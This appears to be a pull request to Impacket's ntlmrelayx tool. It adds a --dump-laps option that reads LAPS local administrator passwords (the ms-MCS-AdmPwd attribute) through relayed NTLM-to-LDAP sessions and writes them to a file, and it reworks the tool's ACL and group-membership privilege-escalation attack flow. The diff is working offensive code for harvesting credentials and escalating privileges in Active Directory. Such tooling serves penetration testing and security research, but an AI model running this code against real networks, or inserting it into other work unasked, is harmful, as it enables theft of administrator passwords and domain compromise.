### PR TITLE
Added LAPS Dumping Support

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -145,7 +145,7 @@ def start_servers(options, threads):
         c.setAttacks(PROTOCOL_ATTACKS)
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
-        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.sid)
+        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.sid)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
         c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
@@ -280,6 +280,7 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
     ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
     ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
+    ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
 
     #IMAP options
     imapoptions = parser.add_argument_group("IMAP client options")

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -533,21 +533,19 @@ class LDAPAttack(ProtocolAttack):
                 result = self.getUserInfo(domainDumper, self.config.escalateuser)
                 # Unless that account does not exist of course
                 if not result:
-                    LOG.error('Unable to escalate without a valid user, aborting.')
-                    return
-                userDn, userSid = result
-                # Perform the ACL attack
-                self.aclAttack(userDn, domainDumper)
-                return
+                    LOG.error('Unable to escalate without a valid user.')
+                else:
+                    userDn, userSid = result
+                    # Perform the ACL attack
+                    self.aclAttack(userDn, domainDumper)
             elif privs['create']:
                 # Create a nice shiny new user for the escalation
                 userDn = self.addUser(privs['createIn'], domainDumper)
                 if not userDn:
-                    LOG.error('Unable to escalate without a valid user, aborting.')
-                    return
+                    LOG.error('Unable to escalate without a valid user.')
                 # Perform the ACL attack
-                self.aclAttack(userDn, domainDumper)
-                return
+                else:
+                    self.aclAttack(userDn, domainDumper)
             else:
                 LOG.error('Cannot perform ACL escalation because we do not have create user '\
                     'privileges. Specify a user to assign privileges to with --escalate-user')
@@ -560,21 +558,21 @@ class LDAPAttack(ProtocolAttack):
                 result = self.getUserInfo(domainDumper, self.config.escalateuser)
                 # Unless that account does not exist of course
                 if not result:
-                    LOG.error('Unable to escalate without a valid user, aborting.')
-                    return
-                userDn, userSid = result
+                    LOG.error('Unable to escalate without a valid user.')
                 # Perform the Group attack
-                self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])
-                return
+                else:
+                    userDn, userSid = result
+                    self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])
+
             elif privs['create']:
                 # Create a nice shiny new user for the escalation
                 userDn = self.addUser(privs['createIn'], domainDumper)
                 if not userDn:
                     LOG.error('Unable to escalate without a valid user, aborting.')
-                    return
                 # Perform the Group attack
-                self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])
-                return
+                else:
+                    self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])
+
             else:
                 LOG.error('Cannot perform ACL escalation because we do not have create user '\
                           'privileges. Specify a user to assign privileges to with --escalate-user')
@@ -587,27 +585,36 @@ class LDAPAttack(ProtocolAttack):
             
             if success:
 
-                filename = "laps-dump-" + self.username
-                with open(filename, "a+") as fd:
+                fd = None
+                filename = "laps-dump-" + self.username + "-" + str(random.randint(0, 99999))
+                count = 0
 
-                    for entry in self.client.response:
-                        try:
+                for entry in self.client.response:
+                    try:
+                        dn = "DN:" + entry['attributes']['distinguishedname']
+                        passwd = "Password:" + entry['attributes']['ms-MCS-AdmPwd']
 
-                            dn = "DN:" + entry['attributes']['distinguishedname']
-                            passwd = "Password:" + entry['attributes']['ms-MCS-AdmPwd']
+                        if fd is None:
+                            fd = open(filename, "a+")
 
-                            LOG.debug(dn)
-                            LOG.debug(passwd)
+                        count += 1
 
-                            fd.write(dn)
-                            fd.write("\n")
-                            fd.write(passwd)
-                            fd.write("\n")
-                        except:
-                            continue
+                        LOG.debug(dn)
+                        LOG.debug(passwd)
 
-                if os.stat(filename).st_size == 0:
-                    os.remove(filename)
+                        fd.write(dn)
+                        fd.write("\n")
+                        fd.write(passwd)
+                        fd.write("\n")
+
+                    except:
+                        continue
+
+                if fd is None:
+                    LOG.info("The relayed user %s does not have permissions to read any LAPS passwords" % self.username)
+                else:
+                    LOG.info("Successfully dumped %d LAPS passwords through relayed account %s" % (count, self.username))
+                    fd.close()
 
         # Perform the Delegate attack if it is enabled and we relayed a computer account
         if self.config.delegateaccess and self.username[-1] == '$':

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -27,6 +27,7 @@ import ldap3
 import ldapdomaindump
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
 from ldap3.utils.conv import escape_filter_chars
+import os
 
 from impacket import LOG
 from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
@@ -586,21 +587,27 @@ class LDAPAttack(ProtocolAttack):
             
             if success:
 
-                fd = open("laps-dump-" + self.username, "w+")
-                for entry in self.client.response:
-                    try:
-                        dn = "DN:" + entry['attributes']['distinguishedname']
-                        passwd = "Password:" + entry['attributes']['ms-MCS-AdmPwd']
+                filename = "laps-dump-" + self.username
+                with open(filename, "a+") as fd:
 
-                        LOG.debug(dn)
-                        LOG.debug(passwd)
+                    for entry in self.client.response:
+                        try:
 
-                        fd.write(dn)
-                        fd.write("\n")
-                        fd.write(passwd)
-                        fd.write("\n")
-                    except:
-                        continue
+                            dn = "DN:" + entry['attributes']['distinguishedname']
+                            passwd = "Password:" + entry['attributes']['ms-MCS-AdmPwd']
+
+                            LOG.debug(dn)
+                            LOG.debug(passwd)
+
+                            fd.write(dn)
+                            fd.write("\n")
+                            fd.write(passwd)
+                            fd.write("\n")
+                        except:
+                            continue
+
+                if os.stat(filename).st_size == 0:
+                    os.remove(filename)
 
         # Perform the Delegate attack if it is enabled and we relayed a computer account
         if self.config.delegateaccess and self.username[-1] == '$':

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -136,7 +136,7 @@ class NTLMRelayxConfig:
     def setRandomTargets(self, randomtargets):
         self.randomtargets = randomtargets
 
-    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, sid):
+    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, sid):
         self.dumpdomain = dumpdomain
         self.addda = addda
         self.aclattack = aclattack
@@ -144,6 +144,7 @@ class NTLMRelayxConfig:
         self.escalateuser = escalateuser
         self.addcomputer = addcomputer
         self.delegateaccess = delegateaccess
+        self.dumplaps = dumplaps
         self.sid = sid
 
     def setMSSQLOptions(self, queries):


### PR DESCRIPTION
Added support to ntlmrelayx to support dumping LAPS passwords and writing them to a file when relaying HTTP -> LDAP traffic. This functionality is useful in scenarios where it is possible to e.g., relay a member of "Account Operators" as, by default, this account has read access to stored LAPS passwords.